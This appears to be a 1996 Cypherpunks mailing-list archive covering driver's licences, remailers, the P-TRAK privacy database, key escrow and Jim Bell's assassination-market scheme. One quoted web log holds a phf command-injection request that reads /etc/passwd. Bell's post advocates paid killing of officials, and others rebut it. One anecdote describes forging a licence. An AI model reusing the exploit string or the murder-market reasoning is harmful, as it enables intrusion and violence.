| black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dlv at bwalk.dm.com Sat Sep 21 07:16:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 22:16:36 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: Black Unicorn writes: > > Do you simply drive without a valid driver's license? I know some folks who > > do, of course, but it's not something that's "worth it" to me. > > Some jurisdictions (D.C. is a good example) are such a joke it's not > funny. An associate of mine literally MADE his own Italian Driver's > license and turned it in, took an eye test, and walked out with a nice new > D.C. license. In NYC a very high percentage of drivers don't have licences, have suspended licences, etc. Generally no one has the time to bother with them unless they want to nail them for something else. A couple of years ago we were involved in a minor car accident with a Chassidic Jew who tried to leave the scene of the accident. My wife chased him and stopped him. :-) The cops came and discovered that he had no papers (including no driver's licence, no insurance, etc). They gave him about $500 worth of tickets for driving without a licence, leaving the scene of an accident, etc (which I rather doubt he was planning to pay) and let him drive on (still without the licence). --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 21 07:34:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 22:34:41 +0800 Subject: Fuckhead In-Reply-To: <199609210227.VAA10007@mailhub.amaranth.com> Message-ID: "William H. Geiger III" writes: > Congradulations dlv at bwalk.dm.com!!!! > > You have won an one way trip into my TWIT filter for your repeated FUCKHEAD post. ^^^^ You are confused. The 'fuckhead' posts (quoting my entire wire clippings and adding the word 'fuckhead' at the end) are not mine. They are sent to me by Timmy May's friends. I just forward them to this mailing list. I believe they're at least as relevant as Timmy May's political rants. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From runnerfx at octet.com Sat Sep 21 09:25:04 1996 From: runnerfx at octet.com (Wearen Life) Date: Sun, 22 Sep 1996 00:25:04 +0800 Subject: Go away CIA In-Reply-To: <199609201646.CAA00999@myinternet.myinternet.net> Message-ID: I wont be suprised if they where ALSO watching who was visting your page. I think now is the time to start looking in your hard drive or floppy disk for anything that my incrimanate you. (did i spell that right)? tah ta /*---------/* Wearen Life www.octet.com/~runnerfx Job: Wish I had one Home: Cyber Space Work: Refer to "Job" On Sat, 21 Sep 1996, Skeeve Stevens wrote: > > > Well well... > > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ > I learnt a few things. > > o it got 50,000 hits in 1 day > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov > department looked at it masses of times. The CIA looked at it every 10-15 > minutes. > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l > 281 > > o Even the CIA tries to hack you. > > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180 > > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and > ncsc.mil sites. > > as I speak the house are looking at it. > b252-209.house.gov unknown - [21/Sep/1996:02:41:37 +1000] "GET /cia/ > > > I "PRESUME" there are no laws (international or otherwise) being broken by > my housing of the mirror... not like I actually care.. but it would be good > to know. > > Ok... ive been up all night chuckling at all the different sort of sites hitting > the mirror... time to sleep. > > > -------------------------------------------------------------------- > Skeeve Stevens Email: skeeve at skeeve.net > CEO/The Big Boss/All round nice guy URL: http://www.skeeve.net/ > MyInternet Australian Anglicans Online > http://www.myinternet.net/ http://www.anglican.asn.au/ > Phone: (+612) 869-3334 Mobile: (0414) SKEEVE [+61414-753-383] > Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E > From joelm at eskimo.com Sat Sep 21 11:04:27 1996 From: joelm at eskimo.com (Joel McNamara) Date: Sun, 22 Sep 1996 02:04:27 +0800 Subject: Private Idaho 2.8b beta release Message-ID: <3.0b19.32.19960921074732.00b95ad0@mail.eskimo.com> The beta release of Private Idaho 2.8b is now available at http://www.eskimo.com/~joelm/pi.html. (Previous beta testers can get an updated version of just the executable at http://www.eskimo.com/~joelm/pi_list.html) Private Idaho is a freeware PGP, anonymous remailer, and nym server front-end for Windows (all versions). Some of the new features in the latest release include: ------------------ Automatic encrypt/decrypt of PIDAHO.INI, NYMS.TXT, PUBKEYS.OUT Automatic encrypt/decrypt of SECRING.PGP and PUBRING.PGP nym.alias.net support Generate key pair command Load passphrase at startup Submit key to MIT server command Get key from MIT server command (must have Net connection) Update remailer info command (must have Net connection) Get remailer keys command (must be have Net connection) Remailer newsgroup header command Delete nym command Attachment support Bug reports, comments, and questions, as always to: joelm at eskimo.com From jimbell at pacifier.com Sat Sep 21 12:00:31 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 03:00:31 +0800 Subject: Free RSA chip Message-ID: <199609211655.JAA21400@mail.pacifier.com> At 01:04 PM 9/16/96 -0700, Lucky Green wrote: >I secured a 30 page data sheet for the new NTT (actually NLC, a subsidiary >of NTT) RSA accelerator chips. The NLC0048 LSI chip can handle keys up to >1024 bits. The secret key can be stored on-chip. If you want a copy of the >data sheet, email me your fax number. > >Furthermore, I have *one* sample chip that I am willing to loan to >somebody in the SF Bay Area with sufficient hardware knowledge to put the >chip to good use. If you think you qualify, let me know who you are and >why you think that you should get the chip. I apologize in advance to the >qualified candidates that do not get the chip. There is only one (that I >can loan out). I don't want the chip, but I'd like to know a few things. 1. How much of a secure telephone does it contain? a. voice A/D/A? b. modem A/D/A DSP? c. Keyboard multiplex? d. control microprocessor? e. Encryption section? 2. Is there any indication that NT+T has worked with any other manufacturers to design some sort of inter-telephone negotiation standard, one that would allow the kind of inter-compatibility that modems have today? Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sat Sep 21 12:05:52 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 03:05:52 +0800 Subject: IBM_gak Message-ID: <199609211655.JAA21426@mail.pacifier.com> At 09:17 AM 9/16/96 -0700, Lucky Green wrote: >On Mon, 16 Sep 1996, John Young wrote: >> 9-15-96. PcWe: >> "IBM Boosts Encryption Initiative " >> >> IBM security initiatives next month will include a >> new way to build encryption into software and >> technology that could enable U.S. companies to export >> products with strong encryption algorithms. IBM also >> will introduce several "key-recovery" technologies >> that could enable businesses to satisfy the >> requirement imposed by the U.S. government that it be >> able to access encrypted data on demand. > >Aparently, Al Gore's recent phone calls to everybody who is anybody in the >industry have paid off. After HP, TIS, and other unnamed parties, now IBM >is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to >a PKI near you. So, the "Little Tramp" and the "Great Dictator" turn out to be one and the same... Jim Bell jimbell at pacifier.com From dthorn at gte.net Sat Sep 21 12:10:22 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 03:10:22 +0800 Subject: anonymous bacon In-Reply-To: <199609201506.JAA03295@atd.atd.ucar.EDU> Message-ID: <324417C8.6E9E@gte.net> Jonathan Corbet wrote: > The following, from RISKS, deserves redistribution.... > Date: Tue, 17 Sep 1996 13:04:47 -0400 > From: pcw at access.digex.net (Peter Wayner) > Subject: Bringing Home the Anonymous Bacon > The *Baltimore Sun* reports in its 17 Sep 1996 issue that people in > Baltimore are paying for drugs with meat (page A1! [pretty saucy!]). > Perhaps this is not yet anonymous digital cash, but certainly > anonymous. [Now someone is going to propose keeping a database of all > sides of beef, and steganographically watermarking the meat in the > context of digitally signed scannable grade-stamps. Perhaps the next > step in monitoring the private drug-meat trade would be to escrow the > inspectors' private keys, derived from the product of two U.S. Primes, > and put the database up on the net: the T-bone connected to the > M-bone, etc.? PGN] Did you ever see one of those mattress tags which reads something like "removal of this tag is a violation of ..... and is punishable by ..."? They could tag the stuff, then make it a violation of law to cut the meat before final consumption. The IRS is very concerned about barter, and besides, how are you gonna go half way on legislating against untraceable barter (other than to prohibit dividing the beef)? From dthorn at gte.net Sat Sep 21 12:19:06 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 03:19:06 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <324415D5.24E7@gte.net> Kurt Vile wrote: > >By the way, the next rev of the California driver's license will > >reportedly have one's *Social Security Number* printed on the card! > >So much for the statement clearly printed on my card: > Illinois already has such a law, in fact you must have an SSN to > even get a DL. Fortunately, the law allows a citizen-unit to choose > if they want their SSN on their DL (imagine that, a choice!) - the > flip side is that you have to specifically ask them not to print > them - they won't ask you. > One would hope that CA's law might provide a similar out... Oh, yeah. This "optional" SSN is a great idea, yeah. So late at night, you get pulled over, and the officer notes that YOU (one of less than a thousand people who don't have the DL-SSN) don't actually have the DL-SSN. Well, just don't get pulled over.... From jimbell at pacifier.com Sat Sep 21 12:19:31 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 03:19:31 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609211655.JAA21404@mail.pacifier.com> At 04:33 PM 9/16/96 -0400, hallam at ai.mit.edu wrote: > >>Yet another obligatory AP (Assassination Politics) reference: If a person >>is really interested in helping out "starving children" he may be able to do >>far more good by purchasing the death of the local tyrant(s), rather than >>(just) buying more food. > > >The problem is that assasination rarely leads to the installation of >a government that is any better. In most cases it gets worse. There is an enormous difference in significance between the following two scenarios: 1. Tyrant A, speaking outside, gets struck by a meteorite and is instantly killed. He is immediately replaced by his second-in-command. 2. Tyrant B is told that he has been threatened with a meteorite strike by an opponent in an hour if he goes on with his speech, he ignores the "unbelievable" warning, and dies on schedule, just as he was warned, struck by a meteorite. What should his vice-thug do in THIS case?!? Physically, the same thing happened: Big boom. But the implications are vastly different. Incident 1 looks like a freak of nature that's unlikely to be repeated. It leads to very few policy changes or changes in precautions. It was a fluke. Incident 2 looks like somebody has developed a new weapon of practically supernatural capabilities. This difference is why I scoff at your attempts to equate political assassination in the past with what will be accomplished in the future. (other people have made this mistake as well; it's a common misunderstanding.) In the past, assassinations have often led to worse replacements, but that is because there is no likely prospect that the assassination will be repeated, as many times as needed, until the job is done. Partly that's because assassinations were often seen to be the work of "lone nuts" (who don't come around all that often), or because they were done by the very people who take over. In either case, the prospects of a repeat are rather low. As anyone who really understands my AP theory recognizes, getting rid of an unwanted leader will become so easy and cheap (on a per-citizen basis) that nobody would dare take the job who angered more than a tiny fraction of the population. A "worse" government would simply never be formed, unless they were suicidal. >In the past the US excuse for supporting bloodthirsty murderers like >Pinochet, Saddam, Marcos and Noriega was that the alternative was >worse. The _truth_, however, is that the alternative was worse...for the US government. It's really very simple: Let me draw an analogy. Modern organophosphate pesticides were initially developed by German chemists in the 1930's. These materials are closely related to Sarin, the well-known nerve agent that killed people in the Tokyo subway attack over a year ago. It turns out that Sarin is a rather simple molecule. Why not use it to kill bugs? Well, it kills bugs just fine. The problem, of course, is that it kills farmers just as well. Since you presumably don't want to do that, you have to go to all the trouble to find compounds that kill bugs, but are as non-toxic as possible to farmers. And if you look at the description of the contents of modern organophosphate pesticides on the bottles, you see names that only a chemist could possibly pronounce, names so long (because their molecules were so complex) that you often have to take a breath in the middle to recite. These compounds were found by individually synthesizing thousands, or even tens of thousands of compounds, and testing each one. Individually. Eventually, they found compounds which were as toxic to bugs as Sarin is to humans, but were far less toxic to humans. They found the needle in the haystack. Likewise, as I've discovered through AP, it will be easy to get rid of tyrants. The exquisitely difficult task is to get rid of ONLY SOME of the tyrants, for example Saddam Hussein, Moammar Khadafi, etc, and leaving most of the rest behind. _THAT'S_ the tricky part. I have the easy task: describing a system to get rid of them all, with no exceptions. But that's the system that nobody in the leadership of any current country wants to see. That is why you won't see Clinton announcing that he's going to use my idea to get rid of Saddam Hussein, and instead will waste hundreds of millions or even billions of dollars in a failed bid to eject the thug. Doesn't that make you feel a lot safer? Jim Bell jimbell at pacifier.com From mrm at netcom.com Sat Sep 21 12:27:37 1996 From: mrm at netcom.com (Marianne Mueller) Date: Sun, 22 Sep 1996 03:27:37 +0800 Subject: job testing SSL Message-ID: <199609211702.KAA09826@netcom20.netcom.com> We're looking for someone who can test an SSL implementation in Java. If you're interested send a resume or a URL either to me or to the group. My email is mrm at eng.sun.com, the group gets resumes at jeeves-jobs at goa.eng.sun.com. If you're interested in the context, see http://java.sun.com/products/jeeves. If you're Perry and you want to flame me send email to mrm at eng.sun.com :-) Marianne http://java.sun.com/people/mrm/ From aba at dcs.ex.ac.uk Sat Sep 21 12:50:55 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 22 Sep 1996 03:50:55 +0800 Subject: CIA hacked In-Reply-To: <1oykuD14w165w@bwalk.dm.com> Message-ID: <199609211305.OAA00455@server.test.net> Dimitri Vulis writes: > > [email reply protesting spam] > > You are confused. The above question was e-mailed to me by one of > Timmy May's friends. What you were doing was confusing... how about attributing what people have said to you, in the standard way? I was unsure what was going on until you clarified here. Instead of including all the headers in there with just a space between your headers and the quoted headers (which makes it hard to follow, and makes one wonder if someone is trying a crude forgery), use standard quoting conventions: Joe Blogss writes in private email: > [quoted message body]... or similar? > I just forward their e-mail to this mailing list. I don't read it. Has it occured to you that most of the email you have been receiving (and posting here) is as a result of the said same habit, and peoples predictable misunderstanding of what you were doing? I would suggest that if you don't want to read what people email to you, kill file them, or delete their email, or ask them in email not to send you email, but don't forward it here! > If you have any comments about Timmy May's friends not knowing > English, trying to insult people, and posting non-crypto-relevant > political rants, address them to Timmy May and his friends. It would seem to me that the first insults were thrown by yourself, and that your strange habit of bouncing all the fallout to the list is perpetuating the problem. Could you stop doing this? Some of us read cpunks on pay per second phone lines, and so on. If you are concerned about non-crypto-relevant politcal rants, how about generating some more signal. I see you are posting the items with the [NEWS] tag, and these look relevant, and useful, I read a few of them myself. If reporting to the list is accurate, I hear you have a PhD with a subject related to crypto, so presumably you would have ample knowledge to contribute technical crypto related thoughts. I'm sure people would be interested in anything along those lines you cared to contribute, and your reputation would benefit, Think about it, Adam -- #!/bin/perl -sp0777i I've been reading articles about the recent flap over Lexis-Nexis' P-TRAK database with interest. A recent Associated Press article said that the lines at Lexis-Nexis have been jammed with individuals requesting they be removed from the database. Lexis-Nexis is certainly not the only database of its kind, but it has certainly generated quit a bit of attention and panic In terms of cypherpunk goals, I think this is a positive development. It demonstrates ever-so-clearly that the average "Joe Schmoe" does not follow the government line that privacy and security are mutually exclusive concepts. Rather, there is an instinctive recognition that privacy and security are inextricably linked. Only when the government pulls on emotional (as opposed to logical) strings by pulling out the "if you only knew what we knew" & "if it saves just one life" arguments does the easily swayed public get pulled in the other direction. The flap over P-TRAK repudiates arguments by Freeh and others that American citizens want to give up their freedoms in the interest of security. If you are in a position to influence government policy (ie. Jim Ray with Judge Kozinski, EFF personages involved in the Bernstein case, PRO-CODE advocates, et al.), then keep these clippings handy. Here is a concrete example that our government and law-enforcement leaders are woefully out of touch with average citizens (not to mention reality!). The leap from P-TRAK to GAK is not that large in the so-called court of public opinion. Sometimes monkey-wrenching is as simple as pointing out the obvious. me _______________________________________________________________ Omegaman PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63 Send e-mail with "get key" in the "Subject:" field to get a copy of my public key _______________________________________________________________ From dsmith at prairienet.org Sat Sep 21 13:18:44 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sun, 22 Sep 1996 04:18:44 +0800 Subject: ANYONES CREDIT CARD # per your request. Message-ID: <199609211740.MAA09483@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Sat Sep 21 12:32:13 1996 > > > Note: Lexis-Nexis is only accepting written or fax requests. You > have the > > > option to fax your removal request to (513) 865-1930 state your full > name > > > and complete address. Or mail the request to: > > > Lexis-Nexis > > > Attn: P-Track > > > P.O. Box 933 > > > Dayton, Ohio > > > 45401-0933 According to the 800 number, you may also be removed from their database by sending a letter to p-trak at prod.lexis-nexis.com. You need to send your name and address, and probably your Citizen- Unit Social Insecurity Number. dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "The world's at stake. Don't confuse me with details." -- Captain America, "Onslaught" ... famous last words -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMkQmnzVTwUKWHSsJAQEClgf/XsSOwYPANaQBXVg+vq/Oh5qgqEMZtyxZ CVy45RYlulXWKMixmWMn7OkebSug53xVfQoBR5SlZ3oCXN+KlQm0bLI1MKiiO0nv SlRz35x6O2lkXXQcyBF1brrk++1uXRQRsKIACh/ceTdMkkTyUk+u0imRschGslqp L84BVvhi/VVASrCgmY5HbwkeeqNlzDUpa5uD9ST10G9UvCMrf6IexEOzvGvfCzmt CFOELYK6e8iiVkP8sPQgj+yQaP08LyezlYuSRu+GcZhr3QljCuOjUghjCIe/aoJk 7RRSiGC/GXGtO/Ut5pOiTOkWmaTPiHUsxnb4cX2lijLyI+jXy5K5qA== =vyc3 -----END PGP SIGNATURE----- From hallam at vesuvius.ai.mit.edu Sat Sep 21 13:18:56 1996 From: hallam at vesuvius.ai.mit.edu (hallam at vesuvius.ai.mit.edu) Date: Sun, 22 Sep 1996 04:18:56 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <199609211655.JAA21404@mail.pacifier.com> Message-ID: <9609211734.AA15897@vesuvius.ai.mit.edu> [AP drivel deleted] Go talk to someone who is a member of an organisation like the PLO or Hammas and pretty near the top. If you think that they would be intimidated for a moment by AP you have another think comming. If it could the US would have assasinated Saddam by now. It can't because it is too difficult to find out where exactly a person will be. Assasination attempts against Castro similarly failed. If you care to look at the history of Cambodia you will see that Lon Nol assumed the presidency despite the knowledge that there was practically no ch chance of defeating the Khumer Rouge and that he would almost certainly be dead in less than a week as a result. Both the assumption AP rests on are utterly false. It is neither possible to assasinate people at will nor will it intimidate. In addition *ANYONE* who attempted to implement AP would be someone *I* would regard as a tyrant and therefore a legitimate target by the rules of AP. I would naturally consider it permissable to engage the support of others in their suppression. Since we now live in the fantasy land of AP I can now wipe out anyone anywhere so I eliminate all AP leaders. I think that this type of talk is incredibly dangerous. There are plenty of people on the net who are psychos and if you spread AP drivel arround someone is going to act on it. Probably not Jim Bell, more likely a psychopath who lurks on the list but does not post. If you call for people to be murdered - and let us not forget that this is what AP is about you bear the responsibility when someone acts on it. I consider AP to be very close to calling for the assasination of the President of the USA. That is a federal crime and there is a law that requires the investigation of any such threats. I suggest that people think *very* carefully before engaging in this dangerous nonsense any further. Phill PS it is not censorship to stop people from advocating murder. From usura at replay.com Sat Sep 21 13:18:56 1996 From: usura at replay.com (Alex de Joode) Date: Sun, 22 Sep 1996 04:18:56 +0800 Subject: WinSock Remailer Version ALPHA 1.3 Now Available Message-ID: <199609211811.UAA29737@basement.replay.com> Remo Pini (rp at rpini.com) wrote: : To: cypherpunks at toad.com : Date: Thu Sep 19 09:07:16 1996 : Has it already been exported by some sinister anonymous? If so, where? ftp.replay.com:/pub/replay/pub/remailer/wsa13.zip where else ...? -- Alex de Joode | Replay IP Service & Web DZign -- The Netherlands usura at replay.com | http://www.replay.com mailto:info at replay.com From chen at chen.com Sat Sep 21 14:18:26 1996 From: chen at chen.com (Mark Chen) Date: Sun, 22 Sep 1996 05:18:26 +0800 Subject: How's the list? In-Reply-To: <199609210245.TAA22366@slack.lne.com> Message-ID: <9609211924.AA00422@pela.chen.com.> Eric Murray writes: > Phil Fraering writes: > > > * I'm now working part of the time at a company that has a lot of > > mail-order sales; are any of you aware of how much credit card fraud is > > going on out there right now? > > No, how much? About twenty basis points with respect to dollar volume. -- Mark Chen 415/341-5539 chen at chen.com D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From loki at infonex.com Sat Sep 21 14:41:21 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 05:41:21 +0800 Subject: "Remailers can't afford to be choosy" In-Reply-To: Message-ID: One important differentiation to make is filtering on form vs. filtering on content. Most if not all remailers have clear usage guidelines. These indicate several form restrictions on what messages the remailer is offering to transmit. These restrictions may be on message size, instruction formatting, number of destinations for one message, or number of identical messages. These restrictions are no more censorship than restricting messages to SMTP compliant ascii. Where people do not follow the stated rules, I take action to enforce them. Either by source blocking the abuser if known, destination blocking the destination, or trying to apply public pressure. I think all these actions are completely reasonable, given that the proper use guidelines were clearly defined up front. It is similar to putting up a fence around your yard when people start hanging out there uninvited. Of necessity most remailers also restrict some content. This is very difficult to enforce, but is generally done for legal reasons. I restrict illegal and harassing posts. Since I don't see the content, these provisions are largely unenforced. Are you suggesting that I not take perfectly legal and open actions to enforce the public statement of allowed uses of my remailer? -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From lharrison at csbh.mhv.net Sat Sep 21 14:45:11 1996 From: lharrison at csbh.mhv.net (Lynne L. Harrison) Date: Sun, 22 Sep 1996 05:45:11 +0800 Subject: ANYONES CREDIT CARD # per your request. Message-ID: <1.5.4.16.19960921192852.2cd71ece@pop.mhv.net> At 12:40 PM 9/21/96 -0500, David E. Smith wrote: > >According to the 800 number, you may also be removed from >their database by sending a letter to p-trak at prod.lexis-nexis.com. >You need to send your name and address, and probably your Citizen- >Unit Social Insecurity Number. True. You *do* have to give your Social Insecurity Number ["SIN"(tm)]. While they have discontinued publishing SIN's, they have them in their databanks and require you to state it as their way of "verifying" that it is the "real" you making the request to be removed. ************************************************************ Lynne L. Harrison, Esq. | "The key to life: Poughkeepsie, New York | - Get up; lharrison at mhv.net | - Survive; http://www.dueprocess.com | - Go to bed." ************************************************************ DISCLAIMER: I am not your attorney; you are not my client. Accordingly, the above is *NOT* legal advice. From mcguirk at indirect.com Sat Sep 21 15:13:27 1996 From: mcguirk at indirect.com (Dan McGuirk) Date: Sun, 22 Sep 1996 06:13:27 +0800 Subject: Where to write crypto? Message-ID: If I want to go to a country outside the United States to write cryptographic code that will be freely distributable, what's the best place to go? From jamesd at echeque.com Sat Sep 21 15:27:34 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 22 Sep 1996 06:27:34 +0800 Subject: timmy waxes a widdle on AP Message-ID: <199609211946.MAA27996@dns2.noc.best.net> At 08:11 PM 9/17/96 -0700, Vladimir Z. Nuri wrote: > but I'm still a bit confused about those prices. what determines > them, anyway? risk to the assassin? it seems that it ought to be > as easy to snuff out one person as it would another. e.g. everybody > walks alone out at night at different times, it seems. Although government services to the rich and poor cost about the same, the quality is radically different. Thus the risk involved in killing a poor person is vastly less than the risk involved in killing a middle class person. This is most noticeable in education, where black children are kept in holding pens with leaky roofs, masquerading as schools, for a cost that would suffice to build classrooms with a hot tub in each classroom and a pentium on every desk, even if we burnt the classroom down with the equipment inside every year and and replaced it every year. On the other hand, food, clothing, and transport, being provided for money by the free market, tend to be roughly equal for rich and poor. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Sat Sep 21 15:36:09 1996 From: jamesd at echeque.com (James A. Donald) Date: Sun, 22 Sep 1996 06:36:09 +0800 Subject: Quantum Computers Message-ID: <199609211946.MAA28008@dns2.noc.best.net> At 05:09 AM 9/18/96 -0400, Rick Osborne wrote: > I'm sorry if I seem to be making light of a very serious topic, but, last > time I checked, computers don't have a reverse. Quantum computers *do* have a reverse. Indeed even when operated in classical mode they *still* have a reverse. A quantum computer is a reversible computer operated at very high speed and very low energy. Reversible computers were invented before quantum computers. Reversible computer were invented in order to demonstrate that there was no lower limit to the energy required to perform certain computational tasks. Later people speculated, and very recently demonstrated that a reversible computer operated in the quantum regime could do things that no classical computer could do. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From alano at teleport.com Sat Sep 21 15:50:05 1996 From: alano at teleport.com (Alan Olsen) Date: Sun, 22 Sep 1996 06:50:05 +0800 Subject: [Noise] anonymous bacon Message-ID: <3.0b16.32.19960921133449.00684550@mail.teleport.com> At 09:28 AM 9/21/96 -0700, Dale Thorn wrote: >Jonathan Corbet wrote: [Government Access to Meat stuff from Risks deleted] > >Did you ever see one of those mattress tags which reads something like >"removal of this tag is a violation of ..... and is punishable by ..."? >They could tag the stuff, then make it a violation of law to cut the >meat before final consumption. The IRS is very concerned about barter, >and besides, how are you gonna go half way on legislating against >untraceable barter (other than to prohibit dividing the beef)? And meat tenderizers would be outlawed, because it would be viewed as an effort to obscure the markings. (You could be sent to jail for beating your meat!) Think of the legal liability for selling someone meat that is later involved with the drug trade! The way the laws are going, you could lose everything for selling a steak to a known drug user. Soon you would have meat market laws similar to the alcohol laws in Utah. You will have to eat the steak on the premises, in front of a government authorized and licensed vendor. (Until the cholesterol police make meat consumption a crime.) Soon we will have gangs fighting over the illegal meat trade. Meat will be murder! Instead of "drive-ins", we will have "drive-bys". Government will have an even bigger reason to put a steak through our civil rights. Our goose will be cooked! Then people will go to trading vegetables and grain. And all the "honest folks" will be left with nothing to eat but rocks. (Until, those too are banned because someone might throw one...) --- | "Remember: You can't have BSDM without BSD." - alan at ctrl-alt-del.com | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From blackart at ctrl-alt-del.com Sat Sep 21 16:15:48 1996 From: blackart at ctrl-alt-del.com (Black Art) Date: Sun, 22 Sep 1996 07:15:48 +0800 Subject: Going AP Shit on the Internet Message-ID: <3.0b16.32.19960921133414.0069a754@www.ctrl-alt-del.com> At 01:34 PM 9/21/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >[AP drivel deleted] > > [Examples of where AP would fail deleted] > >Both the assumption AP rests on are utterly false. It is neither possible >to assasinate people at will nor will it intimidate. > >In addition *ANYONE* who attempted to implement AP would be someone *I* >would regard as a tyrant and therefore a legitimate target by the rules >of AP. I would naturally consider it permissable to engage the support of >others in their suppression. Since we now live in the fantasy land of AP >I can now wipe out anyone anywhere so I eliminate all AP leaders. I'd buy that for a dollar! I would expect that only a small portion of the "targets" on an actual AP system would be political figures. People have a far broader range of people they would like to see eliminated. How many "hits" would John Tesh have gotten after the Olympics? How many "hits" would Urkel get after anyone actually watched him on TV? These powers could be used for good or evil! People do not just want to kill politicians. Many of them would like to kill people they find annoying in their general lives. TV stars. Advertising executives. Bosses. Bill Gates. Brings stalking to a new level! Say a company came out with an Internet browser that was considered the "market leader". A less scrupulous competitor (who has a large company and lots of cash) could afford to have key personnel off-ed as a part of "doing business". (And it would not have to be the figureheads. Less well-known people in charge of key areas, like security could be off-ed.) Is your job important to KILL FOR? They could even hide it in the sales and promotion budget. It could change the face of business forever! Who do you want to kill today? There is no mechanism to assure that AP is used for only the people that Mr. Bell would like to see killed. If it is implemented, then EVERYONE is a target. >I think that this type of talk is incredibly dangerous. There are plenty of >people on the net who are psychos and if you spread AP drivel arround someone >is going to act on it. Probably not Jim Bell, more likely a psychopath who >lurks on the list but does not post. Actually, I would expect that the various government agencies would do their best to track down those trying to implement such a system. Governments do not take competition lightly. The odds of getting a real hit man are also small. The FBI has agents who frequently pose as hit men for the sole purpose of tracking down those who want to eliminate their friends and neighbors. Only organized crime and government have easy access to assassination. ("Government Access to assassination" Escrow anyone?) >If you call for people to be murdered - and let us not forget that this is >what AP is about you bear the responsibility when someone acts on it. I do not think that Mr. Bell is willing to examine the moral consequences of the things that he advocates. (He would get alot more respect from me if he would own up to it and admit he is wanting to see mass murder for hire.) There seems to be a big blind spot here. It would also be a great excuse for the bluenoses who want to regulate the net into extinction. (Advocating murder is not taken well in our society, even if the targets deserve it.) >I consider AP to be very close to calling for the assasination of the >President of the USA. That is a federal crime and there is a law that >requires the investigation of any such threats. I suggest that people >think *very* carefully before engaging in this dangerous nonsense any >further. Facilitating the murder of others through hiring of hit men is illegal no matter who the target is. I wonder how he would find a service provider that would dare host the site. I know of no "data haven" that would risk having a murder for hire server anywhere near their site. They would find their feed cut pretty quick or feel the sting of legal liability or both. (Part of being a "data haven" is not to attract attention to yourself. The first rule of not being seen is "Don't stand up".) >PS it is not censorship to stop people from advocating murder. I disagree with this conclusion. It IS censorship. The only thing that seems to change it is the subject matter. If it was changed to "it is not censorship to stop people from advocating cryptography" or "unrestrained sex" or "destruction of the ruling party" would you still agree? Sometimes advocating murder is considered valid. (As the various people in the media talking about how "we should have offed Husain (sp?).) How do you make the distinction. Whoever is in power this week? I think not. Besides, if you want to weed the nut cases out of society, you let them advocate such things in public. Makes it easier to cart them away before they hurt someone. (Unless they are in Government office. By then, it is too late.) ------------------------------------------------------------------------ Black Art blackart at ctrl-alt-del.com "The Government will mind its own business the day that Malcolm McDowell becomes a spokesman for Crisco." From markm at voicenet.com Sat Sep 21 16:28:00 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 22 Sep 1996 07:28:00 +0800 Subject: [NOISE] Kiddie porn on the Internet In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 21 Sep 1996 hallam at vesuvius.ai.mit.edu wrote: > If you call for people to be murdered - and let us not forget that this is > what AP is about you bear the responsibility when someone acts on it. So 